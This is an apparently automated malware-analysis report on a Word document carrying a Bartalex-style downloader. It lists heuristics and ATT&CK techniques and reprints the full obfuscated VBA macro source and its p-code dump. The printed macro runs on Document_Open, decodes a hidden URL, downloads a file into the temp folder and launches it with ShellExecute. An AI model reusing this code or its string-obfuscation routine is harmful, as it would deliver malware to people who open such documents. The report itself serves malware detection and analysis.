MALICIOUS
278
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Word document containing VBA macros. The document body explicitly instructs the user to 'DOWNLOAD AND ENABLE CONTENT' to view the 'SECURE FILE', acting as a lure. The VBA macros utilize the URLDownloadToFileA API, indicating an attempt to download a second-stage payload from a remote source. The presence of ShellExecuteA further suggests execution of downloaded content.
Heuristics 9
-
ClamAV: Doc.Downloader.Bartalex-6755229-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Bartalex-6755229-0
-
Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOADReference to URLDownloadToFile API
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
URLDownloadToFile in VBA critical OLE_VBA_DOWNLOADURLDownloadToFile in VBAMatched line in script
Private Declare PtrSafe Function ôëâçççéàüàîüûæçéæîüœêâæïâæêîàéâû蜜éüçÿâïâéæëêüéœîïœâêûïœçâôôèôûÿœèïïïîâçèÿææëïîêÿçâœêëüêëœôèîââîûàï Lib "urlmon" Alias "URLDownloadToFileA" (ByVal ÿïàèüèîëûëÿîûÿüâêôüüâïêÿàîœæéâôîîîôêïôÿëëûîîëÿïæâœëüœïûàôôêêÿâèüéüèôüôîïüûéÿæéçꜜæçèûëàèÿâëîêàÿÿüàô As Long, ByVal ïôéûïûüÿûéûêæàûçàüæèààœëàêôÿîÿôœçàÿûçæïàëïëœûâëëôüûèôàêœôëâçççéàüàîüûæçéæîüœêâæïâæêîàéâû蜜éüçÿâïâéæ As String, ByVal ëêüéœîïœâêûïœçâôôèôûÿœèïïïîâçèÿææëïîêÿçâœêëüêëœôèîââîûàïÿïàèüèîëûëÿîûÿüâêôüüâïêÿàîœæé … -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
ôëâçççéàüàîüûæçéæîüœêâæïâæêîàéâû蜜éüçÿâïâéæëêüéœîïœâêûïœçâôôèôûÿœèïïïîâçèÿææëïîêÿçâœêëüêëœôèîââîûàï 0, ûéûêæàûçàüæèààœëàêôÿîÿôœçàÿûçæïàëïëœûâëëôüûèôàêœôëâçççéàüàîüûæçéæîüœêâæïâæêîàéâû蜜éüçÿâïâéæëêüéœîïœ("ºÍväé´Ë¯Ï»„ÓËÍ|À½©Öãݤ¬ÁÁØÜºÉ¸Ý¬ÛÚxɾ䘘¢ÜËÄ¿", "UUHHjrEgAfDUhVSMfczitzvGXYuwFdJnDkqJRGmiihlWPWBcNdhkcAeIsodxnesCllXKmIUjQiTXxmjdvsPlJPLXbpKMVgbDTmGZ"), Environ("temp") & ûéûêæàûçàüæèààœëàêôÿîÿôœçàÿûçæïàëïëœûâëëôüûèôàêœôëâçççéàüàîüûæçéæîüœêâæïâæêîàéâû蜜éüçÿâïâéæëêüéœîïœ("ºÍv", "UUHHjrEgAfDU … -
Reference to ShellExecute API high SC_STR_SHELLEXECReference to ShellExecute API
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main Referenced by macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 20874 bytes |
SHA-256: d5ce758166398ed194ff3737ff4f6dbb2ebdf1bd210c03d2b9d6f38f32b99f2b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare PtrSafe Function ëéüàààâûôûêôîÿàâÿêôïçüÿèüÿçêûâüîâïïâôàœûèüâÿéçôâïêèïüçîèïàüëëæëîœïæèèèêüàæœÿÿéèêçôàüïçéôçéïëæêüüêîûè Lib "shell32.dll" Alias "ShellExecuteA" (ByVal êëœôèîââîûàïÿïàèüèîëûëÿîûÿüâêôüüâïêÿàîœæéâôîîîôêïôÿëëûîîëÿïæâœëüœïûàôôêêÿâèüéüèôüôîïüûéÿæéçꜜæçèûëà As Long, ByVal èÿâëîêàÿÿüàôïôéûïûüÿûéûêæàûçàüæèààœëàêôÿîÿôœçàÿûçæïàëïëœûâëëôüûèôàêœôëâçççéàüàîüûæçéæîüœêâæïâæêîàéâû As String, ByVal 蜜éüçÿâïâéæëêüéœîïœâêûïœçâôôèôûÿœèïïïîâçèÿææëïîêÿçâœêëüêëœôèîââîûàïÿïàèüèîëûëÿîûÿüâêôüüâïêÿàîœæéâôî As String, ByVal îîôêïôÿëëûîîëÿïæâœëüœïûàôôêêÿâèüéüèôüôîïüûéÿæéçꜜæçèûëàèÿâëîêàÿÿüàôïôéûïûüÿûéûêæàûçàüæèààœëàêôÿîÿôœ As String, ByVal çàÿûçæïàëïëœûâëëôüûèôàêœôëâçççéàüàîüûæçéæîüœêâæïâæêîàéâû蜜éüçÿâïâéæëêüéœîïœâêûïœçâôôèôûÿœèïïïîâçèÿæ As String, ByVal æëïîêÿçâœêëüêëœôèîââîûàïÿïàèüèîëûëÿîûÿüâêôüüâïêÿàîœæéâôîîîôêïôÿëëûîîëÿïæâœëüœïûàôôêêÿâèüéüèôüôîïüûéÿ As Long) As Long
Private Declare PtrSafe Function ôëâçççéàüàîüûæçéæîüœêâæïâæêîàéâû蜜éüçÿâïâéæëêüéœîïœâêûïœçâôôèôûÿœèïïïîâçèÿææëïîêÿçâœêëüêëœôèîââîûàï Lib "urlmon" Alias "URLDownloadToFileA" (ByVal ÿïàèüèîëûëÿîûÿüâêôüüâïêÿàîœæéâôîîîôêïôÿëëûîîëÿïæâœëüœïûàôôêêÿâèüéüèôüôîïüûéÿæéçꜜæçèûëàèÿâëîêàÿÿüàô As Long, ByVal ïôéûïûüÿûéûêæàûçàüæèààœëàêôÿîÿôœçàÿûçæïàëïëœûâëëôüûèôàêœôëâçççéàüàîüûæçéæîüœêâæïâæêîàéâû蜜éüçÿâïâéæ As String, ByVal ëêüéœîïœâêûïœçâôôèôûÿœèïïïîâçèÿææëïîêÿçâœêëüêëœôèîââîûàïÿïàèüèîëûëÿîûÿüâêôüüâïêÿàîœæéâôîîîôêïôÿëëûîî As String, ByVal ëÿïæâœëüœïûàôôêêÿâèüéüèôüôîïüûéÿæéçꜜæçèûëàèÿâëîêàÿÿüàôïôéûïûüÿûéûêæàûçàüæèààœëàêôÿîÿôœçàÿûçæïàëïëœ As Long, ByVal ûâëëôüûèôàêœôëâçççéàüàîüûæçéæîüœêâæïâæêîàéâû蜜éüçÿâïâéæëêüéœîïœâêûïœçâôôèôûÿœèïïïîâçèÿææëïîêÿçâœêëü As Long) As Long
Private Sub æâüéâüæèààœëàëôÿîÿôœéààüçæîàëîïœûâëïœüûèôàêûôëâééçèâÿâîüüçééæîÿœëææïâçëôâèâû蜜éÿéàâïâéæïëüèûôïûæêûî()
ôëâçççéàüàîüûæçéæîüœêâæïâæêîàéâû蜜éüçÿâïâéæëêüéœîïœâêûïœçâôôèôûÿœèïïïîâçèÿææëïîêÿçâœêëüêëœôèîââîûàï 0, ûéûêæàûçàüæèààœëàêôÿîÿôœçàÿûçæïàëïëœûâëëôüûèôàêœôëâçççéàüàîüûæçéæîüœêâæïâæêîàéâû蜜éüçÿâïâéæëêüéœîïœ("ºÍväé´Ë¯Ï»„ÓËÍ|À½©Öãݤ¬ÁÁØÜºÉ¸Ý¬ÛÚxɾ䘘¢ÜËÄ¿", "UUHHjrEgAfDUhVSMfczitzvGXYuwFdJnDkqJRGmiihlWPWBcNdhkcAeIsodxnesCllXKmIUjQiTXxmjdvsPlJPLXbpKMVgbDTmGZ"), Environ("temp") & ûéûêæàûçàüæèààœëàêôÿîÿôœçàÿûçæïàëïëœûâëëôüûèôàêœôëâçççéàüàîüûæçéæîüœêâæïâæêîàéâû蜜éüçÿâïâéæëêüéœîïœ("ºÍv", "UUHHjrEgAfDUhVSMfczitzvGXYuwFdJnDkqJRGmiihlWPWBcNdhkcAeIsodxnesCllXKmIUjQiTXxmjdvsPlJPLXbpKMVgbDTmGZ"), 0, 0
ëéüàààâûôûêôîÿàâÿêôïçüÿèüÿçêûâüîâïïâôàœûèüâÿéçôâïêèïüçîèïàüëëæëîœïæèèèêüàæœÿÿéèêçôàüïçéôçéïëæêüüêîûè 0, "open", Environ$("tmp") & ûéûêæàûçàüæèààœëàêôÿîÿôœçàÿûçæïàëïëœûâëëôüûèôàêœôëâçççéàüàîüûæçéæîüœêâæïâæêîàéâû蜜éüçÿâïâéæëêüéœîïœ("ºÍv", "UUHHjrEgAfDUhVSMfczitzvGXYuwFdJnDkqJRGmiihlWPWBcNdhkcAeIsodxnesCllXKmIUjQiTXxmjdvsPlJPLXbpKMVgbDTmGZ"), "", vbNullString, vbNormalFocus
End Sub
Private Sub Document_Open()
æâüéâüæèààœëàëôÿîÿôœéààüçæîàëîïœûâëïœüûèôàêûôëâééçèâÿâîüüçééæîÿœëææïâçëôâèâû蜜éÿéàâïâéæïëüèûôïûæêûî
End Sub
Function ûéûêæàûçàüæèààœëàêôÿîÿôœçàÿûçæïàëïëœûâëëôüûèôàêœôëâçççéàüàîüûæçéæîüœêâæïâæêîàéâû蜜éüçÿâïâéæëêüéœîïœ(âêûïœçâôôèôûÿœèïïïîâçèÿææëïîêÿçâœêëüêëœôèîââîûàïÿïàèüèîëûëÿîûÿüâêôüüâïêÿàîœæéâôîîîôêïôÿëëûîîëÿïæâœëü, œïûàôôêêÿâèüéüèôüôîïüûéÿæéçꜜæçèûëàèÿâëîêàÿÿüàôïôéûïûüÿûéûêæàûçàüæèààœëàêôÿîÿôœçàÿûçæïàëïëœîüééëôïæ)
Dim êûçïëéüàààâûôûêôîÿàâÿêôïçüÿèüÿçêûâüîâïïâôàœûèüâÿéçôâïêèïüçîèïàüëëæëîœïæèèèêüàæœÿÿéèêçôàüïçéôçéïëæêüü, êîûèœèûæôæêéîéœêîœôüçëîôüéçœûêïÿâüëêêèëçèëœééîêêéœèüüïéôëèîûëëççœüæôâôæëôëêèôîâœÿâÿçïïÿàæîéûæœüçêçûœ, œôûëèëâîèîôœîâîçÿûîàûôÿæûûïéûçëœêœëïàûœîàÿèûéèéïîüééëôïæêûçïëéüàààâûôûêôîÿàâÿêôïçüÿèüÿçêûâüîâïïâôàœû, èüâÿéçôâïêèïüçîèïàüëëæëîœïæèèèêüàæœÿÿéèêçôàüïçéôçéïëæêüüêîûèœèûæôæêéîéœêîœôüçëîôüéçœûêïÿâüëêêèëçèëœé, éîêêéœèüüïéôëèîûëëççœüæôâôæëôëêèôîâœÿâÿçïïÿàæîéûæœüçêçûœœôûëèëâîèîôœîâîçÿûîàûôÿæûûïéûçëœêœëïàûœîàÿèû
êûçïëéüàààâûôûêôîÿàâÿêôïçüÿèüÿçêûâüîâïïâôàœûèüâÿéçôâïêèïüçîèïàüëëæëîœïæèèèêüàæœÿÿéèêçôàüïçéôçéïëæêüü = Len(œïûàôôêêÿâèüéüèôüôîïüûéÿæéçꜜæçèûëàèÿâëîêàÿÿüàôïôéûïûüÿûéûêæàûçàüæèààœëàêôÿîÿôœçàÿûçæïàëïëœîüééëôïæ)
êîûèœèûæôæêéîéœêîœôüçëîôüéçœûêïÿâüëêêèëçèëœééîêêéœèüüïéôëèîûëëççœüæôâôæëôëêèôîâœÿâÿçïïÿàæîéûæœüçêçûœ = 1
œôûëèëâîèîôœîâîçÿûîàûôÿæûûïéûçëœêœëïàûœîàÿèûéèéïîüééëôïæêûçïëéüàààâûôûêôîÿàâÿêôïçüÿèüÿçêûâüîâïïâôàœû = Len(âêûïœçâôôèôûÿœèïïïîâçèÿææëïîêÿçâœêëüêëœôèîââîûàïÿïàèüèîëûëÿîûÿüâêôüüâïêÿàîœæéâôîîîôêïôÿëëûîîëÿïæâœëü)
âêûïœçâôôèôûÿœèïïïîâçèÿææëïîêÿçâœêëüêëœôèîââîûàïÿïàèüèîëûëÿîûÿüâêôüüâïêÿàîœæéâôîîîôêïôÿëëûîîëÿïæâœëü = StrReverse(âêûïœçâôôèôûÿœèïïïîâçèÿææëïîêÿçâœêëüêëœôèîââîûàïÿïàèüèîëûëÿîûÿüâêôüüâïêÿàîœæéâôîîîôêïôÿëëûîîëÿïæâœëü)
For èüâÿéçôâïêèïüçîèïàüëëæëîœïæèèèêüàæœÿÿéèêçôàüïçéôçéïëæêüüêîûèœèûæôæêéîéœêîœôüçëîôüéçœûêïÿâüëêêèëçèëœé = œôûëèëâîèîôœîâîçÿûîàûôÿæûûïéûçëœêœëïàûœîàÿèûéèéïîüééëôïæêûçïëéüàààâûôûêôîÿàâÿêôïçüÿèüÿçêûâüîâïïâôàœû To 1 Step -1
éîêêéœèüüïéôëèîûëëççœüæôâôæëôëêèôîâœÿâÿçïïÿàæîéûæœüçêçûœœôûëèëâîèîôœîâîçÿûîàûôÿæûûïéûçëœêœëïàûœîàÿèû = éîêêéœèüüïéôëèîûëëççœüæôâôæëôëêèôîâœÿâÿçïïÿàæîéûæœüçêçûœœôûëèëâîèîôœîâîçÿûîàûôÿæûûïéûçëœêœëïàûœîàÿèû & Chr(Asc(Mid(âêûïœçâôôèôûÿœèïïïîâçèÿææëïîêÿçâœêëüêëœôèîââîûàïÿïàèüèîëûëÿîûÿüâêôüüâïêÿàîœæéâôîîîôêïôÿëëûîîëÿïæâœëü, èüâÿéçôâïêèïüçîèïàüëëæëîœïæèèèêüàæœÿÿéèêçôàüïçéôçéïëæêüüêîûèœèûæôæêéîéœêîœôüçëîôüéçœûêïÿâüëêêèëçèëœé, 1)) - Asc(Mid(œïûàôôêêÿâèüéüèôüôîïüûéÿæéçꜜæçèûëàèÿâëîêàÿÿüàôïôéûïûüÿûéûêæàûçàüæèààœëàêôÿîÿôœçàÿûçæïàëïëœîüééëôïæ, êîûèœèûæôæêéîéœêîœôüçëîôüéçœûêïÿâüëêêèëçèëœééîêêéœèüüïéôëèîûëëççœüæôâôæëôëêèôîâœÿâÿçïïÿàæîéûæœüçêçûœ, 1)))
êîûèœèûæôæêéîéœêîœôüçëîôüéçœûêïÿâüëêêèëçèëœééîêêéœèüüïéôëèîûëëççœüæôâôæëôëêèôîâœÿâÿçïïÿàæîéûæœüçêçûœ = êîûèœèûæôæêéîéœêîœôüçëîôüéçœûêïÿâüëêêèëçèëœééîêêéœèüüïéôëèîûëëççœüæôâôæëôëêèôîâœÿâÿçïïÿàæîéûæœüçêçûœ + 1
If êîûèœèûæôæêéîéœêîœôüçëîôüéçœûêïÿâüëêêèëçèëœééîêêéœèüüïéôëèîûëëççœüæôâôæëôëêèôîâœÿâÿçïïÿàæîéûæœüçêçûœ > êûçïëéüàààâûôûêôîÿàâÿêôïçüÿèüÿçêûâüîâïïâôàœûèüâÿéçôâïêèïüçîèïàüëëæëîœïæèèèêüàæœÿÿéèêçôàüïçéôçéïëæêüü Then êîûèœèûæôæêéîéœêîœôüçëîôüéçœûêïÿâüëêêèëçèëœééîêêéœèüüïéôëèîûëëççœüæôâôæëôëêèôîâœÿâÿçïïÿàæîéûæœüçêçûœ = 1
Next
éîêêéœèüüïéôëèîûëëççœüæôâôæëôëêèôîâœÿâÿçïïÿàæîéûæœüçêçûœœôûëèëâîèîôœîâîçÿûîàûôÿæûûïéûçëœêœëïàûœîàÿèû = StrReverse(éîêêéœèüüïéôëèîûëëççœüæôâôæëôëêèôîâœÿâÿçïïÿàæîéûæœüçêçûœœôûëèëâîèîôœîâîçÿûîàûôÿæûûïéûçëœêœëïàûœîàÿèû)
ûéûêæàûçàüæèààœëàêôÿîÿôœçàÿûçæïàëïëœûâëëôüûèôàêœôëâçççéàüàîüûæçéæîüœêâæïâæêîàéâû蜜éüçÿâïâéæëêüéœîïœ = éîêêéœèüüïéôëèîûëëççœüæôâôæëôëêèôîâœÿâÿçïïÿàæîéûæœüçêçûœœôûëèëâîèîôœîâîçÿûîàûôÿæûûïéûçëœêœëïàûœîàÿèû
End Function
Attribute VB_Name = "NewMacros"
Sub sf()
'
' sf Macro
'
'
End Sub
' Processing file: /opt/analyzer/scan_staging/9ec8958bf27c4328aa468c63d786c81d.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 5254 bytes
' Line #0:
' FuncDefn (Private Declare PtrSafe Function îîôêïôÿëëûîîëÿïæâœëüœïûàôôêêÿâèüéüèôüôîïüûéÿæéçꜜæçèûëàèÿâëîêàÿÿüàôïôéûïûüÿûéûêæàûçàüæèààœëàêôÿîÿôœ Lib "ëêüéœîïœâêûïœçâôôèôûÿœèïïïîâçèÿææëïîêÿçâœêëüêëœôèîââîûàïÿïàèüèîëûëÿîûÿüâêôüüâïêÿàîœæéâôîîîôêïôÿëëûîî" (ByVal çàÿûçæïàëïëœûâëëôüûèôàêœôëâçççéàüàîüûæçéæîüœêâæïâæêîàéâû蜜éüçÿâïâéæëêüéœîïœâêûïœçâôôèôûÿœèïïïîâçèÿæ As Long, ByVal æëïîêÿçâœêëüêëœôèîââîûàïÿïàèüèîëûëÿîûÿüâêôüüâïêÿàîœæéâôîîîôêïôÿëëûîîëÿïæâœëüœïûàôôêêÿâèüéüèôüôîïüûéÿ As String, ByVal shell32.dll As String, ByVal ôëâçççéàüàîüûæçéæîüœêâæïâæêîàéâû蜜éüçÿâïâéæëêüéœîïœâêûïœçâôôèôûÿœèïïïîâçèÿææëïîêÿçâœêëüêëœôèîââîûàï As String, ByVal ÿïàèüèîëûëÿîûÿüâêôüüâïêÿàîœæéâôîîîôêïôÿëëûîîëÿïæâœëüœïûàôôêêÿâèüéüèôüôîïüûéÿæéçꜜæçèûëàèÿâëîêàÿÿüàô As String, ByVal ïôéûïûüÿûéûêæàûçàüæèààœëàêôÿîÿôœçàÿûçæïàëïëœûâëëôüûèôàêœôëâçççéàüàîüûæçéæîüœêâæïâæêîàéâû蜜éüçÿâïâéæ As Long) As Long)
' Line #1:
' FuncDefn (Private Declare PtrSafe Function ëÿïæâœëüœïûàôôêêÿâèüéüèôüôîïüûéÿæéçꜜæçèûëàèÿâëîêàÿÿüàôïôéûïûüÿûéûêæàûçàüæèààœëàêôÿîÿôœçàÿûçæïàëïëœ Lib "vbNullString" (ByVal ûâëëôüûèôàêœôëâçççéàüàîüûæçéæîüœêâæïâæêîàéâû蜜éüçÿâïâéæëêüéœîïœâêûïœçâôôèôûÿœèïïïîâçèÿææëïîêÿçâœêëü As Long, ByVal urlmon As String, ByVal æâüéâüæèààœëàëôÿîÿôœéààüçæîàëîïœûâëïœüûèôàêûôëâééçèâÿâîüüçééæîÿœëææïâçëôâèâû蜜éÿéàâïâéæïëüèûôïûæêûî As String, ByVal ûéûêæàûçàüæèààœëàêôÿîÿôœçàÿûçæïàëïëœûâëëôüûèôàêœôëâçççéàüàîüûæçéæîüœêâæïâæêîàéâû蜜éüçÿâïâéæëêüéœîïœ As Long, ByVal Environ As Long) As Long)
' Line #2:
' FuncDefn (Private Sub vbNormalFocus())
' Line #3:
' LitDI2 0x0000
' LitStr 0x002E "ºÍväé´Ë¯Ï»„ÓËÍ|À½©Öãݤ¬ÁÁØÜºÉ¸Ý¬ÛÚxɾ䘘¢ÜËÄ¿"
' LitStr 0x0064 "UUHHjrEgAfDUhVSMfczitzvGXYuwFdJnDkqJRGmiihlWPWBcNdhkcAeIsodxnesCllXKmIUjQiTXxmjdvsPlJPLXbpKMVgbDTmGZ"
' ArgsLd Document_Open 0x0002
' LitStr 0x0004 "temp"
' ArgsLd âêûïœçâôôèôûÿœèïïïîâçèÿææëïîêÿçâœêëüêëœôèîââîûàïÿïàèüèîëûëÿîûÿüâêôüüâïêÿàîœæéâôîîîôêïôÿëëûîîëÿïæâœëü 0x0001
' LitStr 0x0004 "ºÍv"
' LitStr 0x0064 "UUHHjrEgAfDUhVSMfczitzvGXYuwFdJnDkqJRGmiihlWPWBcNdhkcAeIsodxnesCllXKmIUjQiTXxmjdvsPlJPLXbpKMVgbDTmGZ"
' ArgsLd Document_Open 0x0002
' Concat
' LitDI2 0x0000
' LitDI2 0x0000
' ArgsCall ëÿïæâœëüœïûàôôêêÿâèüéüèôüôîïüûéÿæéçꜜæçèûëàèÿâëîêàÿÿüàôïôéûïûüÿûéûêæàûçàüæèààœëàêôÿîÿôœçàÿûçæïàëïëœ 0x0005
' Line #4:
' LitDI2 0x0000
' LitStr 0x0004 "open"
' LitStr 0x0003 "tmp"
' ArgsLd âêûïœçâôôèôûÿœèïïïîâçèÿææëïîêÿçâœêëüêëœôèîââîûàïÿïàèüèîëûëÿîûÿüâêôüüâïêÿàîœæéâôîîîôêïôÿëëûîîëÿïæâœëü$ 0x0001
' LitStr 0x0004 "ºÍv"
' LitStr 0x0064 "UUHHjrEgAfDUhVSMfczitzvGXYuwFdJnDkqJRGmiihlWPWBcNdhkcAeIsodxnesCllXKmIUjQiTXxmjdvsPlJPLXbpKMVgbDTmGZ"
' ArgsLd Document_Open 0x0002
' Concat
' LitStr 0x0000 ""
' Ld œïûàôôêêÿâèüéüèôüôîïüûéÿæéçꜜæçèûëàèÿâëîêàÿÿüàôïôéûïûüÿûéûêæàûçàüæèààœëàêôÿîÿôœçàÿûçæïàëïëœîüééëôïæ
' Ld êûçïëéüàààâûôûêôîÿàâÿêôïçüÿèüÿçêûâüîâïïâôàœûèüâÿéçôâïêèïüçîèïàüëëæëîœïæèèèêüàæœÿÿéèêçôàüïçéôçéïëæêüü
' ArgsCall îîôêïôÿëëûîîëÿïæâœëüœïûàôôêêÿâèüéüèôüôîïüûéÿæéçꜜæçèûëàèÿâëîêàÿÿüàôïôéûïûüÿûéûêæàûçàüæèààœëàêôÿîÿôœ 0x0006
' Line #5:
' EndSub
' Line #6:
' FuncDefn (Private Sub êîûèœèûæôæêéîéœêîœôüçëîôüéçœûêïÿâüëêêèëçèëœééîêêéœèüüïéôëèîûëëççœüæôâôæëôëêèôîâœÿâÿçïïÿàæîéûæœüçêçûœ())
' Line #7:
' Line #8:
' ArgsCall vbNormalFocus 0x0000
' Line #9:
' EndSub
' Line #10:
' FuncDefn (Function Document_Open(œôûëèëâîèîôœîâîçÿûîàûôÿæûûïéûçëœêœëïàûœîàÿèûéèéïîüééëôïæêûçïëéüàààâûôûêôîÿàâÿêôïçüÿèüÿçêûâüîâïïâôàœû, èüâÿéçôâïêèïüçîèïàüëëæëîœïæèèèêüàæœÿÿéèêçôàüïçéôçéïëæêüüêîûèœèûæôæêéîéœêîœôüçëîôüéçœûêïÿâüëêêèëçèëœé, id_FFFE As Variant))
' Line #11:
' Dim
' VarDefn éîêêéœèüüïéôëèîûëëççœüæôâôæëôëêèôîâœÿâÿçïïÿàæîéûæœüçêçûœœôûëèëâîèîôœîâîçÿûîàûôÿæûûïéûçëœêœëïàûœîàÿèû
' VarDefn StrReverse
' VarDefn Chr
' VarDefn Asc
' VarDefn NewMacros
' Line #12:
' Ld èüâÿéçôâïêèïüçîèïàüëëæëîœïæèèèêüàæœÿÿéèêçôàüïçéôçéïëæêüüêîûèœèûæôæêéîéœêîœôüçëîôüéçœûêïÿâüëêêèëçèëœé
' FnLen
' St éîêêéœèüüïéôëèîûëëççœüæôâôæëôëêèôîâœÿâÿçïïÿàæîéûæœüçêçûœœôûëèëâîèîôœîâîçÿûîàûôÿæûûïéûçëœêœëïàûœîàÿèû
' Line #13:
' LitDI2 0x0001
' St StrReverse
' Line #14:
' Ld œôûëèëâîèîôœîâîçÿûîàûôÿæûûïéûçëœêœëïàûœîàÿèûéèéïîüééëôïæêûçïëéüàààâûôûêôîÿàâÿêôïçüÿèüÿçêûâüîâïïâôàœû
' FnLen
' St Chr
' Line #15:
' Ld œôûëèëâîèîôœîâîçÿûîàûôÿæûûïéûçëœêœëïàûœîàÿèûéèéïîüééëôïæêûçïëéüàààâûôûêôîÿàâÿêôïçüÿèüÿçêûâüîâïïâôàœû
' ArgsLd sf 0x0001
' St œôûëèëâîèîôœîâîçÿûîàûôÿæûûïéûçëœêœëïàûœîàÿèûéèéïîüééëôïæêûçïëéüàààâûôûêôîÿàâÿêôïçüÿèüÿçêûâüîâïïâôàœû
' Line #16:
' StartForVariable
' Ld Asc
' EndForVariable
' Ld Chr
' LitDI2 0x0001
' LitDI2 0x0001
' UMi
' ForStep
' Line #17:
' Ld NewMacros
' Ld œôûëèëâîèîôœîâîçÿûîàûôÿæûûïéûçëœêœëïàûœîàÿèûéèéïîüééëôïæêûçïëéüàààâûôûêôîÿàâÿêôïçüÿèüÿçêûâüîâïïâôàœû
' Ld Asc
' LitDI2 0x0001
' ArgsLd Mid 0x0003
' ArgsLd id_0260 0x0001
' Ld èüâÿéçôâïêèïüçîèïàüëëæëîœïæèèèêüàæœÿÿéèêçôàüïçéôçéïëæêüüêîûèœèûæôæêéîéœêîœôüçëîôüéçœûêïÿâüëêêèëçèëœé
' Ld StrReverse
' LitDI2 0x0001
' ArgsLd Mid 0x0003
' ArgsLd id_0260 0x0001
' Sub
' ArgsLd Document 0x0001
' Concat
' St NewMacros
' Line #18:
' Ld StrReverse
' LitDI2 0x0001
' Add
' St StrReverse
' Line #19:
' Ld StrReverse
' Ld éîêêéœèüüïéôëèîûëëççœüæôâôæëôëêèôîâœÿâÿçïïÿàæîéûæœüçêçûœœôûëèëâîèîôœîâîçÿûîàûôÿæûûïéûçëœêœëïàûœîàÿèû
' Gt
' If
' BoSImplicit
' LitDI2 0x0001
' St StrReverse
' EndIf
' Line #20:
' StartForVariable
' Next
' Line #21:
' Ld NewMacros
' ArgsLd sf 0x0001
' St NewMacros
' Line #22:
' Ld NewMacros
' St Document_Open
' Line #23:
' EndFunc
' Macros/VBA/NewMacros - 917 bytes
' Line #0:
' FuncDefn (Sub id_0264())
' Line #1:
' QuoteRem 0x0000 0x0000 ""
' Line #2:
' QuoteRem 0x0000 0x0009 " sf Macro"
' Line #3:
' QuoteRem 0x0000 0x0000 ""
' Line #4:
' QuoteRem 0x0000 0x0000 ""
' Line #5:
' Line #6:
' EndSub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.